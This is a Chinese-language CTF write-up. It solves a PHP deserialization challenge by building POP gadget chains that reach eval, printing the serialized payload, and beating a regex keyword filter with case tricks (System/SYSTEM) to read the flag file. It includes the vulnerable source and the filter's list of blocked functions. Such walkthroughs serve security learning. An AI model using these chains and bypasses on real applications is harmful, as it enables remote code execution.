题目
<?php
include "waf.php";
class NISA{
public $fun="show_me_flag";
public $txw4ever;
public function __wakeup()
{
if($this->fun=="show_me_flag"){
hint();
}
}
function __call($from,$val){
$this->fun=$val[0];
}
public function __toString()
{
echo $this->fun;
return " ";
}
public function __invoke()
{
checkcheck($this->txw4ever);
@eval($this->txw4ever);
}
}
class TianXiWei{
public $ext;
public $x;
public function __wakeup()
{
$this->ext->nisa($this->x);
}
}
class Ilovetxw{
public $huang;
public $su;
public function __call($fun1,$arg){
$this->huang->fun=$arg[0];
}
public function __toString(){
$bb = $this->su;
return $bb();
}
}
class four{
public $a="TXW4EVER";
private $fun='abc';
public function __set($name, $value)
{
$this->$name=$value;
if ($this->fun = "sixsixsix"){
strtolower($this->a);
}
}
}
if(isset($_GET['ser'])){
@unserialize($_GET['ser']);
}else{
highlight_file(__FILE__);
}
//func checkcheck($data){
// if(preg_match(......)){
// die(something wrong);
// }
//}
//function hint(){
// echo ".......";
// die();
//}
?>
首先看见存在hint()的注释,代码中也存在触发这个hint()的代码
http://node5.anna.nssctf.cn:28752/?ser=O:4:"NISA":1:{s:3:"fun";s:12:"show_me_flag";}
flag is in /
找利用点,存在eval函数
且上面存在checkcheck函数,是过滤的函数,但是不知道具体是什么
先构造链子
NISA::__invoke -> ilovetxw::__tostring -> four::__set -> ilovetxw::__call -> tianxiwei::__wakeup
写payload
<?php
class NISA{
public $fun;
public $txw4ever;
}
class TianXiWei{
public $ext;
public $x;
}
class Ilovetxw{
public $huang;
public $su;
}
class four{
public $a;
private $fun;
}
$a = new NISA;
$a->txw4ever = 'system("ls /");';
$b = new Ilovetxw;
$b->su = $a;
$c = new four;
$c->a = $b;
$b->huang = $c;
$d = new TianXiWei;
$d->ext = $b;
echo urlencode(serialize($d));
?>
结果
O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3BN%3B%7Ds%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3BN%3Bs%3A8%3A%22txw4ever%22%3Bs%3A14%3A%22system%28%22ls+%2F%22%29%22%3B%7D%7Ds%3A1%3A%22x%22%3BN%3B%7D
提交出现somet wrong
即之前出现的checkcheck函数过滤
我不太懂为什么要大小写绕过
大小写绕过,改成 System("tac /f*");
出现flag
后记
打开waf.php看看
//waf.php
<?php
function checkcheck($data){
if (preg_match("/\`|\^|\||\~|assert|\?|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk/",$data,$match)){
die('something wrong');
}
}
function hint(){
echo "flag is in /";
die();
}
?>
只过滤了sys
可能和经验有关吧
大佬更短的链子
class NISA{
public $txw4ever='SYSTEM("cat /f*");';
}
class Ilovetxw{
}
$a = new NISA();
$a->fun = new Ilovetxw();
$a->fun->su = $a;
$a = serialize($a);
echo $a;
解释
在NISA::__wakeup里,做弱比较的时候就能触发__toString
弱比较类型不同,会自动转换类型
接下来看看java,提升类的理解